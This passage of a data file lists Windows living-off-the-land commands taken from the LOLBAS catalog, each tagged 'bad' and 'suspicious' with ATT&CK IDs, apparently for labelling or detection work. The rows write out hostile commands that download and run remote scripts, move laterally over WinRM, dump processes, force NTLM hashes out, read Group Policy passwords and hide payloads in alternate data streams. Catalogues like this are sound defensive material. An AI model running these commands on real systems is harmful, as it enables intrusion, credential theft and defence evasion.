executable.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5ad05bf4e41cfa7b38cec189,pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct},pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Pubprn.yml,Pubprn.vbs,Execute,"[""T1216.001"", {""Execute"": ""SCT""}]",Windows 10,0.85,False,Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b8e1696a63a0f9d5d2c1398b,"powershell.exe -ep bypass -command ""set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()""","powershell.exe -ep bypass -command ""set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/UtilityFunctions.yml,UtilityFunctions.ps1,Execute,"[""T1216"", {""Execute"": ""DLL (.NET)""}]","Windows 10 21H1 (likely other versions as well), Windows 11",0.85,False,Proxy execute Managed DLL with PowerShell,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b2b98ddcdbdffe1f8464b894,"powershell.exe -ep bypass -command ""set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()""","powershell.exe -ep bypass -command ""set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/CL_LoadAssembly.yml,CL_LoadAssembly.ps1,Execute,"[""T1216"", {""Execute"": ""DLL (.NET)""}]","Windows 10 21H1 (likely other versions as well), Windows 11",0.85,False,Proxy execute Managed DLL with PowerShell,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 828d5efea1b53919d6373eb4,set comspec={PATH_ABSOLUTE:.exe} & cscript c:\windows\system32\manage-bde.wsf,set comspec={PATH_ABSOLUTE:.exe} & cscript c:\windows\system32\manage-bde.wsf,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Manage-bde.yml,Manage-bde.wsf,Execute,"[""T1216"", {""Execute"": ""EXE""}]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 45cf56fec3a4b06114c980de,copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf,copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Manage-bde.yml,Manage-bde.wsf,Execute,"[""T1216"", {""Execute"": ""EXE""}]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2a5d6eb6ceffeaa71ee8951c,powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe},powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Launch-VsDevShell.yml,Launch-VsDevShell.ps1,Execute,"[""T1216"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,"Execute binaries from the context of the signed script using the ""VsWherePath"" flag.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3cf36662cad22bc90cdb81f4,"powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath ""/../../../../../; {PATH:.exe} ;""","powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath ""/../../../../../; {PATH:.exe} ;""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Launch-VsDevShell.yml,Launch-VsDevShell.ps1,Execute,"[""T1216"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,"Execute binaries and commands from the context of the signed script using the ""VsInstallationPath"" flag.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5c53f4ab6955628d6d041b76,"winrm invoke Create wmicimv2/Win32_Process @{CommandLine=""{CMD}""} -r:http://target:5985","winrm invoke Create wmicimv2/Win32_Process @{CommandLine=""{CMD}""} -r:http://target:5985",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Winrm.yml,winrm.vbs,Execute,"[""T1216"", {""Execute"": ""CMD""}, {""Execute"": ""Remote""}]","Windows 10, Windows 11",0.85,False,Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dfd1b02106d7eb610ff748d1,"winrm invoke Create wmicimv2/Win32_Service @{Name=""Evil"";DisplayName=""Evil"";PathName=""{CMD}""} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985","winrm invoke Create wmicimv2/Win32_Service @{Name=""Evil"";DisplayName=""Evil"";PathName=""{CMD}""} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Winrm.yml,winrm.vbs,Execute,"[""T1216"", {""Execute"": ""CMD""}, {""Execute"": ""Remote""}]","Windows 10, Windows 11",0.85,False,Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 947040e9b487aa0139c44a89,%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty,%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSScripts/Winrm.yml,winrm.vbs,AWL Bypass,"[""T1220"", {""Execute"": ""XSL""}]","Windows 10, Windows 11",0.85,False,"Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 45a735c769ccb55440c6dcce,Presentationhost.exe {PATH_ABSOLUTE:.xbap},Presentationhost.exe {PATH_ABSOLUTE:.xbap},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Presentationhost.yml,Presentationhost.exe,Execute,"[""T1218"", {""Execute"": ""XBAP""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Executes the target XAML Browser Application (XBAP) file,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a3a163dca1e6ed8a26dca365,Presentationhost.exe {REMOTEURL},Presentationhost.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Presentationhost.yml,Presentationhost.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,It will download a remote payload and place it in INetCache.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d51563b0a0054a997a0180e6,tar -cf {PATH}:ads {PATH_ABSOLUTE:folder},tar -cf {PATH}:ads {PATH_ABSOLUTE:folder},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Tar.yml,Tar.exe,ADS,"[""T1564.004"", {""Type"": ""Compression""}]","Windows 10, Windows 11",0.85,False,Compress one or more files to an alternate data stream (ADS).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ac597c4f95349f2767ccf58a,tar -xf {PATH}:ads,tar -xf {PATH}:ads,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Tar.yml,Tar.exe,ADS,"[""T1564.004"", {""Type"": ""Compression""}]","Windows 10, Windows 11",0.85,False,Decompress a compressed file from an alternate data stream (ADS).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1b5c67be48eca22fcbdf86c6,tar -xf {PATH_SMB:.tar},tar -xf {PATH_SMB:.tar},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Tar.yml,Tar.exe,Copy,"[""T1105"", {""Type"": ""Compression""}]","Windows 10, Windows 11",0.85,False,Extracts archive.tar from the remote (internal) host to the current host.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ab3ba7f1fe732ee2f5416783,Runonce.exe /AlternateShellStartup,Runonce.exe /AlternateShellStartup,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Runonce.yml,Runonce.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes a Run Once Task that has been configured in the registry.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2f1606e649fe14d483b856db,"set windir=c:\test& cd ""C:\Program Files\Internet Explorer\"" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}","set windir=c:\test& cd ""C:\Program Files\Internet Explorer\"" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Iediagcmd.yml,iediagcmd.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]","Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11",0.85,False,Executes binary that is pre-planted at C:\test\system32\netsh.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7d291ccca8845778cb5d4ca4,msbuild.exe {PATH:.xml},msbuild.exe {PATH:.xml},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msbuild.yml,Msbuild.exe,AWL Bypass,"[""T1127.001"", {""Execute"": ""CSharp""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Build and execute a C# project stored in the target XML file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a432f34b616befceffc4360e,msbuild.exe {PATH:.csproj},msbuild.exe {PATH:.csproj},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msbuild.yml,Msbuild.exe,Execute,"[""T1127.001"", {""Execute"": ""CSharp""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Build and execute a C# project stored in the target csproj file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 54c18445b1fe38dede4865d0,"msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo","msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msbuild.yml,Msbuild.exe,Execute,"[""T1127.001"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes generated Logger DLL file with TargetLogger export.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f808eec5eecfad6256af60a5,msbuild.exe {PATH:.proj},msbuild.exe {PATH:.proj},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msbuild.yml,Msbuild.exe,Execute,"[""T1127.001"", {""Execute"": ""XSL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e3fd9c8295bdbdec94a78859,msbuild.exe @{PATH:.rsp},msbuild.exe @{PATH:.rsp},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msbuild.yml,Msbuild.exe,Execute,"[""T1036"", {""Execute"": ""CMD""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 76388d7f953581621217215c,pktmon.exe start --etw,pktmon.exe start --etw,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Pktmon.yml,Pktmon.exe,Reconnaissance,"[""T1040""]","Windows 10 1809 and later, Windows 11",0.85,False,Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8ced1e7a2faba8ccccdcd728,pktmon.exe filter add -p 445,pktmon.exe filter add -p 445,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Pktmon.yml,Pktmon.exe,Reconnaissance,"[""T1040""]","Windows 10 1809 and later, Windows 11",0.85,False,Select Desired ports for packet capture,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 15f81a2cd57e1f4da7571251,dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll},dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Dnscmd.yml,Dnscmd.exe,Execute,"[""T1543.003"", {""Execute"": ""DLL""}, {""Execute"": ""Remote""}]",Windows server,0.85,False,Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review da9d4013b8052c780f113f5c,rasautou -d {PATH:.dll} -p export_name -a a -e e,rasautou -d {PATH:.dll} -p export_name -a a -e e,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rasautou.yml,Rasautou.exe,Execute,"[""T1218"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1",0.85,False,Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e25cc70174db9f6a3fdfa8a0,MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe},MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/MpCmdRun.yml,MpCmdRun.exe,Download,"[""T1105""]",Windows 10,0.85,False,"Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8372f3bf1ca88824434c8e3a,"copy ""C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe"" C:\Users\Public\Downloads\MP.exe && chdir ""C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\"" && ""C:\Users\Public\Downloads\MP.exe"" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe","copy ""C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe"" C:\Users\Public\Downloads\MP.exe && chdir ""C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\"" && ""C:\Users\Public\Downloads\MP.exe"" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/MpCmdRun.yml,MpCmdRun.exe,Download,"[""T1105""]",Windows 10,0.85,False,"Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f5c0769c985d3faf06c5ff3c,MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe,MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/MpCmdRun.yml,MpCmdRun.exe,ADS,"[""T1564.004""]",Windows 10,0.85,False,Download file to machine and store it in Alternate Data Stream,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 20aedf9ce6e6c8e41d80268b,"SyncAppvPublishingServer.exe ""n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX""","SyncAppvPublishingServer.exe ""n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Syncappvpublishingserver.yml,SyncAppvPublishingServer.exe,Execute,"[""T1218"", {""Execute"": ""PowerShell""}]","Windows 10 1709, Windows 10 1703, Windows 10 1607",0.85,False,Example command on how inject Powershell code into the process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d34ad7341884a9ce533644ba,tttracer.exe {PATH_ABSOLUTE:.exe},tttracer.exe {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Tttracer.yml,Tttracer.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]","Windows 10 1809 and newer, Windows 11",0.85,False,Execute specified executable from tttracer.exe. Requires administrator privileges.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8c50fc84b2a92bde97f35da0,TTTracer.exe -dumpFull -attach {PID},TTTracer.exe -dumpFull -attach {PID},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Tttracer.yml,Tttracer.exe,Dump,"[""T1003""]","Windows 10 1809 and newer, Windows 11",0.85,False,Dumps process using tttracer.exe. Requires administrator privileges,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8a25c035e0104b6146962f05,findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe,findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Findstr.yml,Findstr.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dadb3650a8b2d20401e8bf6f,findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe,findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Findstr.yml,Findstr.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b3cc9d1193a5282dec7e5be9,findstr /S /I cpassword \\sysvol\policies\*.xml,findstr /S /I cpassword \\sysvol\policies\*.xml,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Findstr.yml,Findstr.exe,Credentials,"[""T1552.001""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Search for stored password in Group Policy files stored on SYSVOL.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 563661316ca661e3d04834f4,findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe},findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Findstr.yml,Findstr.exe,Download,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8956d96ec1272222c9149e84,"C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}","C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/At.yml,At.exe,Execute,"[""T1053.002"", {""Execute"": ""CMD""}]",Windows 7 or older,0.85,False,Create a recurring task to execute every day at a specific time.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2c573f1a1c84729ac2351179,extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe,extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Extrac32.yml,Extrac32.exe,ADS,"[""T1564.004"", {""Type"": ""Compression""}]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 71fe3d2e11bb17380a46ec0e,extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE},extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Extrac32.yml,Extrac32.exe,Download,"[""T1105""]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copy the source file to the destination file and overwrite it.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c4fcb3afef08b6a3a5443bad,extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe},extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Extrac32.yml,Extrac32.exe,Copy,"[""T1105""]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Command for copying file from one folder to another,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8b97495a31b4148420bc5e03,rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM,rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rpcping.yml,Rpcping.exe,Credentials,"[""T1003""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a4889e30200d0c1aff0528b1,rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM,rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rpcping.yml,Rpcping.exe,Credentials,"[""T1187""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f3406ab12d3ef323c5504ae7,"rundll32.exe {PATH},EntryPoint","rundll32.exe {PATH},EntryPoint",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rundll32.yml,Rundll32.exe,Execute,"[""T1218.011"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d25923eb77d83eca10275c5c,"rundll32.exe {PATH_SMB:.dll},EntryPoint","rundll32.exe {PATH_SMB:.dll},EntryPoint",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rundll32.yml,Rundll32.exe,Execute,"[""T1218.011"", {""Execute"": ""DLL""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 977f631a954ec307e51db5fe,"rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:{REMOTEURL}"")","rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:{REMOTEURL}"")",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rundll32.yml,Rundll32.exe,Execute,"[""T1218.011"", {""Execute"": ""JScript""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 19658825a4c2fd139c33cb04,"rundll32 ""{PATH}:ADSDLL.dll"",DllMain","rundll32 ""{PATH}:ADSDLL.dll"",DllMain",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rundll32.yml,Rundll32.exe,ADS,"[""T1564.004"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3dee381e608cf82920a5d0a1,rundll32.exe -sta {CLSID},rundll32.exe -sta {CLSID},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rundll32.yml,Rundll32.exe,Execute,"[""T1218.011"", {""Execute"": ""COM""}]","Windows 10 (and likely previous versions), Windows 11",0.85,False,Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bb3449786689e1aa778aab7c,colorcpl {PATH},colorcpl {PATH},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Colorcpl.yml,Colorcpl.exe,Copy,"[""T1036.005""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copies the referenced file to C:\Windows\System32\spool\drivers\color\.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7395b0c3fc932ddc603fbe05,Scriptrunner.exe -appvscript {PATH:.exe},Scriptrunner.exe -appvscript {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Scriptrunner.yml,Scriptrunner.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes executable,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 66ab37a1f5497cd1300d8e1a,ScriptRunner.exe -appvscript {PATH_SMB:.cmd},ScriptRunner.exe -appvscript {PATH_SMB:.cmd},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Scriptrunner.yml,Scriptrunner.exe,Execute,"[""T1218"", {""Execute"": ""Remote""}, {""Execute"": ""CMD""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes cmd file from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0eaf4253dde409b8ada5f4d6,regedit /E {PATH_ABSOLUTE}:regfile.reg 